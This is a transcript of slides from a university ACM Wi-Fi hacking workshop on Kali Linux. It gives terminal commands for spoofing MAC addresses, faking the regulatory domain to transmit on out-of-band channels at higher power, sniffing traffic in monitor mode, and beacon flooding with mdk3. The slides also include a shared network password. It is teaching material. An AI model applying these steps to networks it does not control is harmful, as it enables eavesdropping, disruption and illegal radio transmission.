ACM Wi-Fi Workshop
description
Transcript of ACM Wi-Fi Workshop
![Page 1: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/1.jpg)
ACM Wi-Fi Workshop
Presented By:Chris Rawlings
Brad Emge
![Page 2: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/2.jpg)
Disclaimer
• By participating in this workshop you agree to be hacked for demonstration purposes only. Don't worry, no personal data will be collected or stored.
• Tools demonstrated in this panel are legitimate devices that comply with all the necessary rules and regulations and are used by Governments and Penetration testers to conduct lawful spying and security audits.
• The contents of this file are for educational purposes only. It is strongly suggested that you do not use this knowledge for illegal purposes.
![Page 3: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/3.jpg)
Information
• All steps in this slide show were performed and tested on 32-bit kali linux version 1.0.6 with an Alfa AWUSO36H USB wireless card(these are the operating system and wireless card you have in front of you).
• Any statement that beings with ‘#’ is a command to be typed in the terminal
![Page 4: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/4.jpg)
What is Kali Linux
• Debian based Linux operating system
• Designed for the sole purpose of penetration testing, exploitation, and hacking
![Page 5: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/5.jpg)
Booting into Kali Linux
• Start with computer off• Plug in flash drive and USB wireless
card• Boot the computer off of the USB flash
drive• From YUMI select system tools then
kali• Select live (686-pae) from the boot
menu
![Page 6: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/6.jpg)
Post Kali Boot
• Make sure that your computer is not in “airplane” mode– Click applicationssystem
toolspreferencessystem settingsnetwork
– Make sure airplane mode is off– Close that window
![Page 7: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/7.jpg)
Temporarily Connecting to The Internet
• Click the network icon in the upper right– Looks like two computers with a red
circle and a X• Select the MST-PSK-N network• Make sure you are connecting with
the non-realtek wireless adapter• Enter the password “JoeMiner”
![Page 8: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/8.jpg)
Getting Necessary Files
• Open the terminal• Type #wget
http://tinyurl.com/acmwifiworkshopfiles
• Open root under the places menu• Unzip the file and make sure the
files are all in the root folder
![Page 9: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/9.jpg)
Terms and Definitions
• Access Point(AP)• Bandwidth• Channel• Evil Twin• Frequency• Honeypot• IEEE 802.11
![Page 10: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/10.jpg)
Terms and Definitions
• IP Address• ISM Band• MAC Address• Modes of Wi-fi• NIC• Packet
![Page 11: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/11.jpg)
Terms and Definitions
• Rainbow Table• WEP• Wi-Fi• WPA• WPA2• WPS
![Page 12: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/12.jpg)
FINDING THE CORRECT WIRELESS CARD
![Page 13: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/13.jpg)
Open the terminal
![Page 14: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/14.jpg)
Type #airmon-ng
![Page 15: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/15.jpg)
FINDING YOUR MAC ADDRESS
![Page 16: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/16.jpg)
Type #ifconfig wlan1
• ifconfig– program we are using
• wlan1– interface we want information on
![Page 17: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/17.jpg)
#ifconfig wlan1
![Page 18: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/18.jpg)
CHANGING YOUR MAC ADDRESS
![Page 19: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/19.jpg)
Type #ifconfig wlan1 down
• ifconfig– program that we are running
• wlan1– interface we are operating on
• down– disable the interface
![Page 20: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/20.jpg)
#ifconfig wlan1 down
![Page 21: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/21.jpg)
Type #macchanger –m de:ad:be:ef:c0:fe wlan1
• macchanger– program we are using
• -m– manually set the MAC address
• de:ed:be:ef:c0:fe– MAC address of your choice
• wlan1– interface we are changing the MAC of
![Page 22: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/22.jpg)
#macchanger –m de:ad:be:ef:c0:fe wlan1
![Page 23: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/23.jpg)
Type #ifconfig wlan1 up
• ifconfig– program that we are running
• wlan1– interface we are operating on
• down– enable the interface
![Page 24: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/24.jpg)
#ifconfig wlan1 up
![Page 25: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/25.jpg)
Type #ifconfig wlan1
• ifconfig– program we are using
• wlan1– interface we are interested in
![Page 26: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/26.jpg)
#ifconfig wlan1
![Page 27: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/27.jpg)
RANDOMLY CHANGING YOUR MAC ADDRESS
![Page 28: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/28.jpg)
Type #ifconfig wlan1 down
• ifconfig– program that we are running
• wlan1– interface we are operating on
• down– disable the interface
![Page 29: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/29.jpg)
#ifconfig wlan1 down
![Page 30: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/30.jpg)
Type #macchanger –r wlan1
• macchanger– program we are using
• -r – random MAC address
• wlan1– interface we are operating on
![Page 31: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/31.jpg)
#macchanger –r wlan1
![Page 32: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/32.jpg)
Type #ifconfig wlan1 up
• ifconfig– program we are using
• wlan1– interface we are interested in
• up– enable the interface
![Page 33: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/33.jpg)
#ifconfig wlan1 up
![Page 34: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/34.jpg)
Type #ifconfig wlan1
• ifconfig– the program we are using
• wlan1– the interface we are interested in
![Page 35: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/35.jpg)
#ifconfig wlan1
![Page 36: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/36.jpg)
CHANGING YOUR MAC ADDRESS BACK TO IT’S FACTORY SETTING
![Page 37: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/37.jpg)
Type #ifconfig wlan1 down
• ifconfig– program that we are running
• wlan1– interface we are operating on
• down– disable the interface
![Page 38: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/38.jpg)
#ifconfig wlan1 down
![Page 39: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/39.jpg)
Type #macchanger –p wlan1
• macchanger– the program we are using
• -p– changes the MAC back to factory
settings• wlan1
– the interface we are operating on
![Page 40: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/40.jpg)
#macchanger –p wlan1
![Page 41: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/41.jpg)
Type #ifconfig wlan1 up
• ifconfig– program we are using
• wlan1– interface we are interested in
• up– enable the interface
![Page 42: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/42.jpg)
#ifconfig wlan1 up
![Page 43: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/43.jpg)
Type #ifconfig wlan1
• ifconfig– the program we are using
• wlan1– the interface we are interested in
![Page 44: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/44.jpg)
#ifconfig wlan1
![Page 45: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/45.jpg)
CHANGING THE CHANNEL OF YOUR WIRELESS CARD
![Page 46: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/46.jpg)
type #iwconfig wlan1
• iwconfig– program we are using
• wlan1 – interface we are interested in
![Page 47: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/47.jpg)
#iwconfig wlan1
![Page 48: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/48.jpg)
type #iwconfig wlan1 channel c
• iwconfig– program we are using
• wlan1– interface we are operating on
• channel– allows you to change the channel
• c– specific channel you wish to use
1,2,3…
![Page 49: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/49.jpg)
#iwconfig wlan1 channel c
![Page 50: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/50.jpg)
type #iwconfig wlan1
• iwconfig– program we are using
• wlan1 – interface we are interested in
![Page 51: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/51.jpg)
#iwconfig wlan1
![Page 52: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/52.jpg)
OPERATING OUTSIDE OF US REGULATION FREQUENCIES
![Page 53: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/53.jpg)
type #iw reg get
• iw– program we are using
• reg– short for regulation
• get– show the iw regulation settings
![Page 54: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/54.jpg)
#iw reg get
![Page 55: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/55.jpg)
type #iw reg set JP
• iw– program we are using
• reg– short for regulation
• set– allows us to set the country regulation
• JP– country code for japan
• allows us to operate on channels 12,13,&14
![Page 56: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/56.jpg)
#iw reg set JP
![Page 57: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/57.jpg)
type #iw reg get
• iw– program we are using
• reg– short for regulation
• get– show the iw regulation settings
![Page 58: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/58.jpg)
#iw reg get
![Page 59: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/59.jpg)
Type #iwconfig wlan1 channel 14
• iwconfig– program we are using
• wlan1– interface we are operating on
• channel– allows us to set the channel
• 14– channel we are setting
![Page 60: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/60.jpg)
#iwconfig wlan1 channel 14
![Page 61: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/61.jpg)
Type #iwconfig wlan1
• iwconfig – program we are using
• wlan1– interface we are interested in
![Page 62: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/62.jpg)
#iwconfig wlan1
![Page 63: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/63.jpg)
CHANGING THE CHANNEL BACK TO A LEGAL FREQUENCY
![Page 64: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/64.jpg)
type #iwconfig wlan1 channel c
• iwconfig– program we are using
• wlan1– interface we are operating on
• channel– allows you to change the channel
• c– specific channel you wish to use
1,2,3…
![Page 65: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/65.jpg)
#iwconfig wlan1 channel c
![Page 66: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/66.jpg)
OPERATING YOUR WIRELESS CARD WITH MORE POWER
![Page 67: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/67.jpg)
Type #iwconfig wlan1
• iwconfig– program we are using
• wlan1– interface we are operating on
![Page 68: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/68.jpg)
#iwconfig wlan1
![Page 69: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/69.jpg)
Type #iw reg set BO
• iw– program we are using
• reg– short for regulation
• set– allows us to set the country regulation
• BO– country code for Bolivia
![Page 70: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/70.jpg)
#iw reg set BO
![Page 71: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/71.jpg)
Type #iwconfig wlan1 txpower 30
• iwconfig– program we are using
• wlan1 – interface we are operating on
• txpower– stands for transmit power
• 30– power output in dBm
![Page 72: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/72.jpg)
#iwconfig wlan1 txpower 30
![Page 73: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/73.jpg)
Type #iwconfig wlan1
• iwconfig– program we are using
• wlan1– interface we are operating on
![Page 74: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/74.jpg)
#iwconfig wlan1
![Page 75: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/75.jpg)
Note on Transmit Power
• The power output has increased from .1 Watt to 1 Watt
• With our current equipment(Wi-Fi card and antenna) we will not be violating FCC regulation, however with a higher gain antenna we could be
![Page 76: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/76.jpg)
FINDING THE MODES YOUR WIRELESS CARDS SUPPORTS
![Page 77: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/77.jpg)
Type #airmon-ng
• airmon-ng– program we are using
![Page 78: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/78.jpg)
#airmon-ng
![Page 79: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/79.jpg)
Type #iw phy phy0 info|grep –A3 modes
• iw– program we are using
• phy– search based upon physical device number
• phy0– physical device number from airmon-ng
• info– give us the info about the phy0 device
• | grep– pipes the output into the program grep
• -A3– indicates to output 3 lines are the given search term
• modes– the term we are searching for with grep
![Page 80: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/80.jpg)
#iw phy phy0 info|grep –A3 modes
![Page 81: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/81.jpg)
Modes Supported
• IBSS– ad-hoc mode– computer to computer connection
• managed– allows you to connect to networks– your Wi-Fi card is usually in managed mode
• monitor– promiscuous mode– allows you to view traffic not destined to your card
![Page 82: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/82.jpg)
OPERATING YOUR CARD IN AD-HOC MODE
![Page 83: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/83.jpg)
Type #ifconfig wlan1 down
• ifconfig– program that we are running
• wlan1– interface we are operating on
• down– disable the interface
![Page 84: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/84.jpg)
#ifconfig wlan1 down
![Page 85: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/85.jpg)
Type #iwconfig wlan1 mode ad-hoc
• iwconfig– program we are using
• wlan1– interface we are operating on
• mode– allows us to set a specific mode
• ad-hoc– the mode we will be using
![Page 86: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/86.jpg)
#iwconfig wlan1 mode ad-hoc
![Page 87: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/87.jpg)
Type #iwconfig wlan1 channel 1
• iwconfig– program we are using
• wlan1– interface we are operating on
• channel– allows us to change the channel
• 1– specific channel we are using 1,2,3…
![Page 88: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/88.jpg)
#iwconfig wlan1 channel 1
![Page 89: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/89.jpg)
Type #iwconfig wlan1 essid ‘nameofnetwork’
• iwconfig– program we are using
• wlan1– interface we are operating on
• essid– allows us to set the network name
• ‘nameofnetwork’– name of the network
![Page 90: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/90.jpg)
iwconfig wlan1 essid ‘nameofnetwork’
![Page 91: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/91.jpg)
Type #iwconfig wlan1 key s:’password’
• iwconfig– program we are using
• wlan1– interface we are operating on
• key– allows us to operate a network with a WEP key– a WPA/WPA2 key is not possible(I think)
• s:– indicates the key entered is in ASCII
• ‘password’– the key as an ASCII String
![Page 92: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/92.jpg)
#iwconfig wlan1 key s:’password’
![Page 93: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/93.jpg)
Type #ifconfig wlan1 up
• ifconfig– program we are using
• wlan1– interface we are operating on
• up– enable the interface
![Page 94: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/94.jpg)
#ifconfig wlan1 up
![Page 95: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/95.jpg)
Type #iwconfig wlan1
• iwconfig– the program we are using
• wlan1– the interface we are operating on
![Page 96: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/96.jpg)
#iwconfig wlan1
![Page 97: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/97.jpg)
TURNING OFF AD-HOC MODE
![Page 98: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/98.jpg)
type #iwconfig wlan1 mode managed
• iwconfig– program we are using
• wlan1– interface we are operating on
• mode– allows us to change the mode of the
adapter• managed
– sets managed mode
![Page 99: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/99.jpg)
OPERATING YOUR CARD IN MONITOR MODE
![Page 100: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/100.jpg)
type #airmon-ng start wlan1
• airmong-ng– program we are using
• start– enables monitor mode
• wlan1– interface we wish to enable monitor
mode on
![Page 101: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/101.jpg)
#airmon-ng start wlan1
![Page 102: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/102.jpg)
type #kill 3018 & kill 3853
• kill– command to stop programs from
running• 3018
– PID of process from slide before• &
– and, allows multiple commands in one line
![Page 103: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/103.jpg)
#kill 3018 & kill 3853
![Page 104: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/104.jpg)
type #iwconfig
• iwconfig– program we are using
![Page 105: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/105.jpg)
#iwconfig
![Page 106: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/106.jpg)
DATA GATHERING IN MONITOR MODE
![Page 107: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/107.jpg)
type #tshark –i mon0
• tshark– program we are using– terminal wireshark
• -i– interface
• mon0– interface we are operating on
![Page 108: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/108.jpg)
#tshark –i mon0
![Page 109: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/109.jpg)
#tshark –i mon0
![Page 110: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/110.jpg)
type ctrl-c
• crtl-c– stops the running program
![Page 111: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/111.jpg)
type #airodump-ng mon0
• airodump-ng– program we are using
• mon0– interface we wish to view wireless
traffic on
![Page 112: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/112.jpg)
#airodump-ng mon0
![Page 113: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/113.jpg)
#airodump-ng mon0
![Page 114: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/114.jpg)
#airodump-ng mon0
• BSSID– MAC address of access point
• station– MAC address of connected client
• Probe– shows what access points a station is
looking for
![Page 115: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/115.jpg)
type ctrl-c
• crtl-c– stops the running program
![Page 116: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/116.jpg)
BEACON FLOODING
![Page 117: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/117.jpg)
What are Beacons
• Management Frame in IEEE 802.11(Wi-Fi)
• Transmitted to announce the presence of a network
• Includes information such as the name, the channel, supported data speeds, whether or not it is encrypted, etc.
![Page 118: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/118.jpg)
type #nano ssidlist
• nano– text editor I am using– you may use something else if you
prefer• ssidlist
– filename for the text file that will contain the SSIDS we will be broadcasting
![Page 119: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/119.jpg)
#nano ssidlist
![Page 120: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/120.jpg)
type different network names on separate lines
![Page 121: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/121.jpg)
type ctrl-x, y, enter
• This saves the file in nano• you could also write out the file and
then exit• this may be different if you didn’t
use nano
![Page 122: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/122.jpg)
type #mdk3 mon0 b –f ssidlist
• mdk3– program we are using
• mon0– interface we are operating on
• b– means to send out beacon frames
• ssidlist– text files with the network names in it
![Page 123: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/123.jpg)
#mdk3 mon0 b –f ssidlist
![Page 124: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/124.jpg)
#mdk3 mon0 b –f ssidlist
![Page 125: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/125.jpg)
type ctrl-c to stop
• stops the running program
![Page 126: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/126.jpg)
VIEWING PROBE REQUESTS
![Page 127: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/127.jpg)
What are Probe Requests
• Management Frame in IEEE 802.11(Wi-Fi)
• A packet sent from a client(computer, phone, etc) to see if a network is within range
• Your devices are constantly sending out Probe Requests and we can view them(also exploit them, but that’s later)
![Page 128: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/128.jpg)
type #airodump-ng mon0
• airodump-ng – program we are using
• mon0– interface we are operating on
![Page 129: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/129.jpg)
#airodump-ng mon0
• In a very dense Wi-Fi environment, we will be unable to see the probe requests at first
• to fix this– zoom out
• available from the view menu– stop the program with ctrl-c – zoom in
• available from the view menu
![Page 130: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/130.jpg)
#airodump-ng mon0
![Page 131: ACM Wi-Fi Workshop](https://reader037.fdocuments.net/reader037/viewer/2022103007/56816181550346895dd111e3/html5/thumbnails/131.jpg)
PASSIVE NETWORK SCAN
